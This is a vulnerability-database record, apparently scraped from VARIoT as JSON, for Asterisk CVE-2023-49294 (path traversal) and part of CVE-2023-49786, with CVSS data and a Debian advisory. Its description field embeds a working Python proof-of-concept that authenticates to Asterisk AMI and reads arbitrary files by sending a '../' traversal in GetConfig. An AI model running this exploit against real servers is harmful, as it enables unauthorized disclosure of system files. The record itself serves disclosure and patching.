      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-202312-2340",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "asterisk",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "digium",
        "version": "20.5.1"
      },
      {
        "model": "certified asterisk",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "sangoma",
        "version": "16.8.0"
      },
      {
        "model": "certified asterisk",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "sangoma",
        "version": "18.9"
      },
      {
        "model": "asterisk",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "digium",
        "version": "19.0.0"
      },
      {
        "model": "asterisk",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "digium",
        "version": "18.20.1"
      },
      {
        "model": "asterisk",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "digium",
        "version": "21.0.0"
      },
      {
        "model": "certified asterisk",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "sangoma",
        "version": "13.13.0"
      },
      {
        "model": "asterisk",
        "scope": null,
        "trust": 0.8,
        "vendor": "digium",
        "version": null
      },
      {
        "model": "certified asterisk",
        "scope": null,
        "trust": 0.8,
        "vendor": "sangoma",
        "version": null
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2023-020239"
      },
      {
        "db": "NVD",
        "id": "CVE-2023-49294"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Sean Pesce",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "177819"
      }
    ],
    "trust": 0.1
  },
  "cve": "CVE-2023-49294",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "author": "nvd@nist.gov",
            "availabilityImpact": "NONE",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "exploitabilityScore": 3.9,
            "id": "CVE-2023-49294",
            "impactScore": 3.6,
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
            "version": "3.1"
          },
          {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "author": "security-advisories@github.com",
            "availabilityImpact": "NONE",
            "baseScore": 4.9,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "HIGH",
            "exploitabilityScore": 1.2,
            "id": "CVE-2023-49294",
            "impactScore": 3.6,
            "integrityImpact": "NONE",
            "privilegesRequired": "HIGH",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N",
            "version": "3.1"
          },
          {
            "attackComplexity": "Low",
            "attackVector": "Network",
            "author": "NVD",
            "availabilityImpact": "None",
            "baseScore": 7.5,
            "baseSeverity": "High",
            "confidentialityImpact": "High",
            "exploitabilityScore": null,
            "id": "CVE-2023-49294",
            "impactScore": null,
            "integrityImpact": "None",
            "privilegesRequired": "None",
            "scope": "Unchanged",
            "trust": 0.8,
            "userInteraction": "None",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "nvd@nist.gov",
            "id": "CVE-2023-49294",
            "trust": 1.0,
            "value": "HIGH"
          },
          {
            "author": "security-advisories@github.com",
            "id": "CVE-2023-49294",
            "trust": 1.0,
            "value": "MEDIUM"
          },
          {
            "author": "NVD",
            "id": "CVE-2023-49294",
            "trust": 0.8,
            "value": "High"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2023-020239"
      },
      {
        "db": "NVD",
        "id": "CVE-2023-49294"
      },
      {
        "db": "NVD",
        "id": "CVE-2023-49294"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Asterisk is an open source private branch exchange and telephony toolkit. In Asterisk prior to versions 18.20.1, 20.5.1, and 21.0.1, as well as certified-asterisk prior to 18.9-cert6, it is possible to read any arbitrary file even when the `live_dangerously` is not enabled. This allows arbitrary files to be read. Asterisk versions 18.20.1, 20.5.1, and 21.0.1, as well as certified-asterisk prior to 18.9-cert6, contain a fix for this issue. Digium of Asterisk Path traversal vulnerabilities exist in products from multiple vendors.Information may be obtained. # Exploit Title: Asterisk AMI - Partial File Content \u0026 Path Disclosure (Authenticated)\n# Date: 2023-03-26\n# Exploit Author: Sean Pesce\n# Vendor Homepage: https://asterisk.org/\n# Software Link: https://downloads.asterisk.org/pub/telephony/asterisk/old-releases/\n# Version: 18.20.0\n# Tested on: Debian Linux\n# CVE: CVE-2023-49294\n\n#!/usr/bin/env python3\n#\n# Proof of concept exploit for CVE-2023-49294, an authenticated vulnerability in Asterisk AMI that\n# facilitates filesystem enumeration (discovery of existing file paths) and limited disclosure of\n# file contents. Disclosed files must adhere to the Asterisk configuration format, which is similar\n# to the common INI configuration format. \n#\n# References:\n#   https://nvd.nist.gov/vuln/detail/CVE-2023-49294\n#   https://github.com/asterisk/asterisk/security/advisories/GHSA-8857-hfmw-vg8f\n#   https://docs.asterisk.org/Asterisk_18_Documentation/API_Documentation/AMI_Actions/GetConfig/\n\n\nimport argparse\nimport getpass\nimport socket\nimport sys\n\n\nCVE_ID = \u0027CVE-2023-49294\u0027\n\nDEFAULT_PORT = 5038\nDEFAULT_FILE = \u0027/etc/hosts\u0027\nDEFAULT_ACTION_ID = 0\nDEFAULT_TCP_READ_SZ = 1048576  # 1MB\n\n\n\ndef ami_msg(action, args, encoding=\u0027utf8\u0027):\n    assert type(action) == str, f\u0027Invalid type for AMI Action (expected string): {type(action)}\u0027\n    assert type(args) == dict, f\u0027Invalid type for AMI arguments (expected dict): {type(args)}\u0027\n    if \u0027ActionID\u0027 not in args:\n        args[\u0027ActionID\u0027] = 0\n    line_sep = \u0027\\r\\n\u0027\n    data = f\u0027Action: {action}{line_sep}\u0027\n    for a in args:\n        data += f\u0027{a}: {args[a]}{line_sep}\u0027\n    data += line_sep\n    return data.encode(encoding)\n\n\n\ndef tcp_send_rcv(sock, data, read_sz=DEFAULT_TCP_READ_SZ):\n    assert type(data) in (bytes, bytearray, memoryview), f\u0027Invalid data type (expected bytes): {type(data)}\u0027\n    sock.sendall(data)\n    resp = b\u0027\u0027\n    while not resp.endswith(b\u0027\\r\\n\\r\\n\u0027):\n        resp += sock.recv(read_sz)\n    return resp\n\n\n\nif __name__ == \u0027__main__\u0027:\n    # Parse command-line arguments\n    argparser = argparse.ArgumentParser()\n    argparser.add_argument(\u0027host\u0027, type=str, help=\u0027The host name or IP address of the Asterisk AMI server\u0027)\n    argparser.add_argument(\u0027-p\u0027, \u0027--port\u0027, type=int, help=f\u0027Asterisk AMI TCP port (default: {DEFAULT_PORT})\u0027, default=DEFAULT_PORT)\n    argparser.add_argument(\u0027-u\u0027, \u0027--user\u0027, type=str, help=f\u0027Asterisk AMI user\u0027, required=True)\n    argparser.add_argument(\u0027-P\u0027, \u0027--password\u0027, type=str, help=f\u0027Asterisk AMI secret\u0027, default=None)\n    argparser.add_argument(\u0027-f\u0027, \u0027--file\u0027, type=str, help=f\u0027File to read (default: {DEFAULT_FILE})\u0027, default=DEFAULT_FILE)\n    argparser.add_argument(\u0027-a\u0027, \u0027--action-id\u0027, type=int, help=f\u0027Action ID (default: {DEFAULT_ACTION_ID})\u0027, default=DEFAULT_ACTION_ID)\n    if \u0027-h\u0027 in sys.argv or \u0027--help\u0027 in sys.argv:\n        print(f\u0027Proof of concept exploit for {CVE_ID} in Asterisk AMI. More information here: \\nhttps://nvd.nist.gov/vuln/detail/{CVE_ID}\\n\u0027, file=sys.stderr)\n        argparser.print_help()\n        sys.exit(0)\n    args = argparser.parse_args()\n\n    # Validate command-line arguments\n    assert 1 \u003c= args.port \u003c= 65535, f\u0027Invalid port number: {args.port}\u0027\n    args.host = socket.gethostbyname(args.host)\n    if args.password is None:\n        args.password = getpass.getpass(f\u0027[PROMPT] Enter the AMI password for {args.user}: \u0027)\n\n    print(f\u0027[INFO] Proof of concept exploit for {CVE_ID}\u0027, file=sys.stderr)\n    print(f\u0027[INFO] Connecting to Asterisk AMI:  {args.user}@{args.host}:{args.port}\u0027, file=sys.stderr)\n\n    # Connect to the Asterisk AMI server\n    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n    sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n    sock.connect((args.host, args.port))\n\n    # Read server banner\n    banner = sock.recv(DEFAULT_TCP_READ_SZ)\n    print(f\u0027[INFO] Connected to {banner.decode(\"utf8\").strip()}\u0027, file=sys.stderr)\n\n    # Authenticate to the Asterisk AMI server\n    login_msg = ami_msg(\u0027Login\u0027, {\u0027Username\u0027:args.user,\u0027Secret\u0027:args.password})\n    login_resp = tcp_send_rcv(sock, login_msg)\n    while b\u0027Authentication\u0027 not in login_resp:\n        login_resp = tcp_send_rcv(sock, b\u0027\u0027)\n    if b\u0027Authentication accepted\u0027 not in login_resp:\n        print(f\u0027\\n[ERROR] Invalid credentials: \\n{login_resp.decode(\"utf8\")}\u0027, file=sys.stderr)\n        sys.exit(1)\n    #print(f\u0027[INFO] Authenticated: {login_resp.decode(\"utf8\")}\u0027, file=sys.stderr)\n    print(f\u0027[INFO] Login success\u0027, file=sys.stderr)\n\n    # Obtain file data via path traversal\n    traversal = \u0027../../../../../../../../\u0027\n    cfg_msg = ami_msg(\u0027GetConfig\u0027, {\n        \u0027ActionID\u0027: args.action_id,\n        \u0027Filename\u0027: f\u0027{traversal}{args.file}\u0027,\n        #\u0027Category\u0027: \u0027default\u0027,\n        #\u0027Filter\u0027: \u0027name_regex=value_regex,\u0027,\n    })\n    resp = tcp_send_rcv(sock, cfg_msg)\n    while b\u0027Response\u0027 not in resp:\n        resp = tcp_send_rcv(sock, b\u0027\u0027)\n\n    print(f\u0027\u0027, file=sys.stderr)\n    print(f\u0027{resp.decode(\"utf8\")}\u0027)\n\n    if b\u0027Error\u0027 in resp:\n        sys.exit(1)\n\n    pass  # Done\n            \n\n. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA512\n\n- -------------------------------------------------------------------------\nDebian Security Advisory DSA-5596-1                   security@debian.org\nhttps://www.debian.org/security/                          Markus Koschany\nJanuary 04, 2024                      https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage        : asterisk\nCVE ID         : CVE-2023-37457 CVE-2023-38703 CVE-2023-49294 CVE-2023-49786\nDebian Bug     : 1059303 1059032 1059033\n\nMultiple security vulnerabilities have been discovered in Asterisk, an Open\nSource Private Branch Exchange. \n\nCVE-2023-37457\n\n    The \u0027update\u0027 functionality of the PJSIP_HEADER dialplan function can exceed\n    the available buffer space for storing the new value of a header. By doing\n    so this can overwrite memory or cause a crash. This is not externally\n    exploitable, unless dialplan is explicitly written to update a header based\n    on data from an outside source. If the \u0027update\u0027 functionality is not used\n    the vulnerability does not occur. \n\nCVE-2023-38703\n\n    PJSIP is a free and open source multimedia communication library written in\n    C with high level API in C, C++, Java, C#, and Python languages. SRTP is a\n    higher level media transport which is stacked upon a lower level media\n    transport such as UDP and ICE. Currently a higher level transport is not\n    synchronized with its lower level transport that may introduce a\n    use-after-free issue. This vulnerability affects applications that have\n    SRTP capability (`PJMEDIA_HAS_SRTP` is set) and use underlying media\n    transport other than UDP. This vulnerability\u2019s impact may range from\n    unexpected application termination to control flow hijack/memory\n    corruption. \n\nCVE-2023-49786\n\n   Asterisk is susceptible to a DoS due to a race condition in the hello\n   handshake phase of the DTLS protocol when handling DTLS-SRTP for media\n   setup. This attack can be done continuously, thus denying new DTLS-SRTP\n   encrypted calls during the attack. Abuse of this vulnerability may lead to\n   a massive Denial of Service on vulnerable Asterisk servers for calls that\n   rely on DTLS-SRTP. \n\n\nFor the oldstable distribution (bullseye), these problems have been fixed\nin version 1:16.28.0~dfsg-0+deb11u4. \n\nWe recommend that you upgrade your asterisk packages. \n\nFor the detailed security status of asterisk please refer to\nits security tracker page at:\nhttps://security-tracker.debian.org/tracker/asterisk\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n-----BEGIN PGP SIGNATURE-----\n\niQKTBAEBCgB9FiEErPPQiO8y7e9qGoNf2a0UuVE7UeQFAmWXIDJfFIAAAAAALgAo\naXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEFD\nRjNEMDg4RUYzMkVERUY2QTFBODM1RkQ5QUQxNEI5NTEzQjUxRTQACgkQ2a0UuVE7\nUeRqthAA0ZarRHMpoNwTCAiVuVzcNqGVls/XvEvDbw1DNgjeKptlm4qafmVxHd6F\nJtloc8zD2w0sOCZCSbATZDosXlFCkAj09aI6oSfJOLBlqRDFVNhPn1Y4a1xOgAfl\nAZyn458v3TqlNFcZjJ89qHHociZ+fDfMUYpMsp/v9A4AOQjKn7AKYJ7aaL5PHR8b\nzejn2pP/8Hv592K4+xa5h/6a0AaXX0eOTlxZDFh7x93oP+op0k4v1J7ivP+Qs4wk\nT5iOqs6JrMc640ZprXB3c8HjapZt4ee5+Yp7An3Z7o/r9crXqT/6ocIRPmkomXVb\nbhZXSfEs5BmzkdWSnOBigSWthSp9umPKWWV9wUwSe1115XxhT43J7oBix9gkNCEu\nmN5Po/yaZQUDEtWx1DpVZtI3TNBwyv28f2XoUy72oq0WqEvBGC8hLDMXqjVWxhRh\nbRXfairiS/pfx2h4eIT5xUKX7xUUCEcGpZ2hIEgGGlS8TX2le+mWa+ipKNPYrBWJ\nQvg+MJ2JD9O3jMMS85y7ISuWUDNSeIDUSa0E48QWExZd8tmuknyDgPx5i4/nDVC+\nsxH1LnEgbUjLLfCCF0CZgbYebiEmUqyfvOSaJ3olekrxkje2WwVY+uJ4NJXBycPU\n+k3Db3c/h/zoYJ9A3ZKz/xu5L32grES2FMxdBDFeF/5VloO4/dg=N8+A\n-----END PGP SIGNATURE-----\n",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2023-49294"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2023-020239"
      },
      {
        "db": "PACKETSTORM",
        "id": "177819"
      },
      {
        "db": "PACKETSTORM",
        "id": "176383"
      }
    ],
    "trust": 1.8
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2023-49294",
        "trust": 2.8
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2023-020239",
        "trust": 0.8
      },
      {
        "db": "PACKETSTORM",
        "id": "177819",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "176383",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2023-020239"
      },
      {
        "db": "PACKETSTORM",
        "id": "177819"
      },
      {
        "db": "PACKETSTORM",
        "id": "176383"
      },
      {
        "db": "NVD",
        "id": "CVE-2023-49294"
      }
    ]
  },
  "id": "VAR-202312-2340",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "VARIoT devices database",
        "id": null
      }
    ],
    "trust": 0.75
  },
  "last_update_date": "2024-08-14T14:30:07.750000Z",
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-22",
        "trust": 1.0
      },
      {
        "problemtype": "Path traversal (CWE-22) [ others ]",
        "trust": 0.8
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2023-020239"
      },
      {
        "db": "NVD",
        "id": "CVE-2023-49294"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 1.9,
        "url": "https://github.com/asterisk/asterisk/security/advisories/ghsa-8857-hfmw-vg8f"
      },
      {
        "trust": 1.8,
        "url": "https://github.com/asterisk/asterisk/blob/master/main/manager.c#l3757"
      },
      {
        "trust": 1.8,
        "url": "https://github.com/asterisk/asterisk/commit/424be345639d75c6cb7d0bd2da5f0f407dbd0bd5"
      },
      {
        "trust": 1.8,
        "url": "https://lists.debian.org/debian-lts-announce/2023/12/msg00019.html"
      },
      {
        "trust": 1.0,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2023-49294"
      },
      {
        "trust": 0.1,
        "url": "https://downloads.asterisk.org/pub/telephony/asterisk/old-releases/"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/{cve_id}\\n\u0027,"
      },
      {
        "trust": 0.1,
        "url": "https://asterisk.org/"
      },
      {
        "trust": 0.1,
        "url": "https://docs.asterisk.org/asterisk_18_documentation/api_documentation/ami_actions/getconfig/"
      },
      {
        "trust": 0.1,
        "url": "https://www.debian.org/security/"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2023-38703"
      },
      {
        "trust": 0.1,
        "url": "https://www.debian.org/security/faq"
      },
      {
        "trust": 0.1,
        "url": "https://security-tracker.debian.org/tracker/asterisk"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2023-49786"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2023-37457"
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2023-020239"
      },
      {
        "db": "PACKETSTORM",
        "id": "177819"
      },
      {
        "db": "PACKETSTORM",
        "id": "176383"
      },
      {
        "db": "NVD",
        "id": "CVE-2023-49294"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2023-020239"
      },
      {
        "db": "PACKETSTORM",
        "id": "177819"
      },
      {
        "db": "PACKETSTORM",
        "id": "176383"
      },
      {
        "db": "NVD",
        "id": "CVE-2023-49294"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2024-01-16T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2023-020239"
      },
      {
        "date": "2024-03-28T14:16:21",
        "db": "PACKETSTORM",
        "id": "177819"
      },
      {
        "date": "2024-01-05T14:31:02",
        "db": "PACKETSTORM",
        "id": "176383"
      },
      {
        "date": "2023-12-14T20:15:52.730000",
        "db": "NVD",
        "id": "CVE-2023-49294"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2024-01-16T02:49:00",
        "db": "JVNDB",
        "id": "JVNDB-2023-020239"
      },
      {
        "date": "2023-12-29T00:15:49.930000",
        "db": "NVD",
        "id": "CVE-2023-49294"
      }
    ]
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Digium\u00a0 of \u00a0Asterisk\u00a0 Path traversal vulnerabilities in products from multiple vendors such as",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2023-020239"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "info disclosure",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "177819"
      }
    ],
    "trust": 0.1
  }
}

var-202312-0487

Vulnerability from variot

Asterisk is an open source private branch exchange and telephony toolkit. In Asterisk prior to versions 18.20.1, 20.5.1, and 21.0.1; as well as certified-asterisk prior to 18.9-cert6; Asterisk is susceptible to a DoS due to a race condition in the hello handshake phase of the DTLS protocol when handling DTLS-SRTP for media setup. This attack can be done continuously, thus denying new DTLS-SRTP encrypted calls during the attack. Abuse of this vulnerability may lead to a massive Denial of Service on vulnerable Asterisk servers for calls that rely on DTLS-SRTP. Commit d7d7764cb07c8a1872804321302ef93bf62cba05 contains a fix, which is part of versions 18.20.1, 20.5.1, 21.0.1, amd 18.9-cert6. Digium of Asterisk Race condition vulnerabilities exist in products from multiple vendors.Service operation interruption (DoS) It may be in a state. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512

Debian Security Advisory DSA-5596-1 security@debian.org https://www.debian.org/security/ Markus Koschany January 04, 2024 https://www.debian.org/security/faq

Package : asterisk CVE ID : CVE-2023-37457 CVE-2023-38703 CVE-2023-49294 CVE-2023-49786 Debian Bug : 1059303 1059032 1059033

Multiple security vulnerabilities have been discovered in Asterisk, an Open Source Private Branch Exchange.

CVE-2023-37457

The 'update' functionality of the PJSIP_HEADER dialplan function can exceed
the available buffer space for storing the new value of a header. By doing
so this can overwrite memory or cause a crash. This is not externally
exploitable, unless dialplan is explicitly written to update a header based
on data from an outside source. If the 'update' functionality is not used
the vulnerability does not occur.

CVE-2023-38703

PJSIP is a free and open source multimedia communication library written in
C with high level API in C, C++, Java, C#, and Python languages. SRTP is a
higher level media transport which is stacked upon a lower level media
transport such as UDP and ICE. Currently a higher level transport is not
synchronized with its lower level transport that may introduce a
use-after-free issue. This vulnerability affects applications that have
SRTP capability (`PJMEDIA_HAS_SRTP` is set) and use underlying media
transport other than UDP. This vulnerability’s impact may range from
unexpected application termination to control flow hijack/memory
corruption.

CVE-2023-49294

It is possible to read any arbitrary file even when the `live_dangerously`
option is not enabled.

For the oldstable distribution (bullseye), these problems have been fixed in version 1:16.28.0~dfsg-0+deb11u4.

We recommend that you upgrade your asterisk packages.

For the detailed security status of asterisk please refer to its security tracker page at: https://security-tracker.debian.org/tracker/asterisk

Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org -----BEGIN PGP SIGNATURE-----

iQKTBAEBCgB9FiEErPPQiO8y7e9qGoNf2a0UuVE7UeQFAmWXIDJfFIAAAAAALgAo aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEFD RjNEMDg4RUYzMkVERUY2QTFBODM1RkQ5QUQxNEI5NTEzQjUxRTQACgkQ2a0UuVE7 UeRqthAA0ZarRHMpoNwTCAiVuVzcNqGVls/XvEvDbw1DNgjeKptlm4qafmVxHd6F Jtloc8zD2w0sOCZCSbATZDosXlFCkAj09aI6oSfJOLBlqRDFVNhPn1Y4a1xOgAfl AZyn458v3TqlNFcZjJ89qHHociZ+fDfMUYpMsp/v9A4AOQjKn7AKYJ7aaL5PHR8b zejn2pP/8Hv592K4+xa5h/6a0AaXX0eOTlxZDFh7x93oP+op0k4v1J7ivP+Qs4wk T5iOqs6JrMc640ZprXB3c8HjapZt4ee5+Yp7An3Z7o/r9crXqT/6ocIRPmkomXVb bhZXSfEs5BmzkdWSnOBigSWthSp9umPKWWV9wUwSe1115XxhT43J7oBix9gkNCEu mN5Po/yaZQUDEtWx1DpVZtI3TNBwyv28f2XoUy72oq0WqEvBGC8hLDMXqjVWxhRh bRXfairiS/pfx2h4eIT5xUKX7xUUCEcGpZ2hIEgGGlS8TX2le+mWa+ipKNPYrBWJ Qvg+MJ2JD9O3jMMS85y7ISuWUDNSeIDUSa0E48QWExZd8tmuknyDgPx5i4/nDVC+ sxH1LnEgbUjLLfCCF0CZgbYebiEmUqyfvOSaJ3olekrxkje2WwVY+uJ4NJXBycPU +k3Db3c/h/zoYJ9A3ZKz/xu5L32grES2FMxdBDFeF/5VloO4/dg=N8+A -----END PGP SIGNATURE-----

Show details on source website

JSON

To clipboard

{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-202312-0487",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "asterisk",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "digium",
        "version": "20.5.1"
      },
      {
        "model": "certified asterisk",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "sangoma",
        "version": "16.8.0"
      },
      {
        "model": "certified asterisk",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "sangoma",
        "version": "18.9"
      },
      {
        "model": "asterisk",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "digium",
        "version": "19.0.0"
      },
      {
        "model": "asterisk",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "digium",
        "version": "18.20.1"
      },
      {
        "model": "asterisk",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "digium",
        "version": "21.0.0"
      },
      {
        "model": "certified asterisk",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "sangoma",
        "version": "13.13.0"
      },
      {
        "model": "certified asterisk",
        "scope": null,
        "trust": 0.8,
        "vendor": "sangoma",
        "version": null
      },
      {
        "model": "asterisk",
        "scope": null,
        "trust": 0.8,
        "vendor": "digium",
        "version": null
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2023-024446"
      },
      {
        "db": "NVD",
        "id": "CVE-2023-49786"
      }
    ]
  },
  "credits": {
    "@context": {
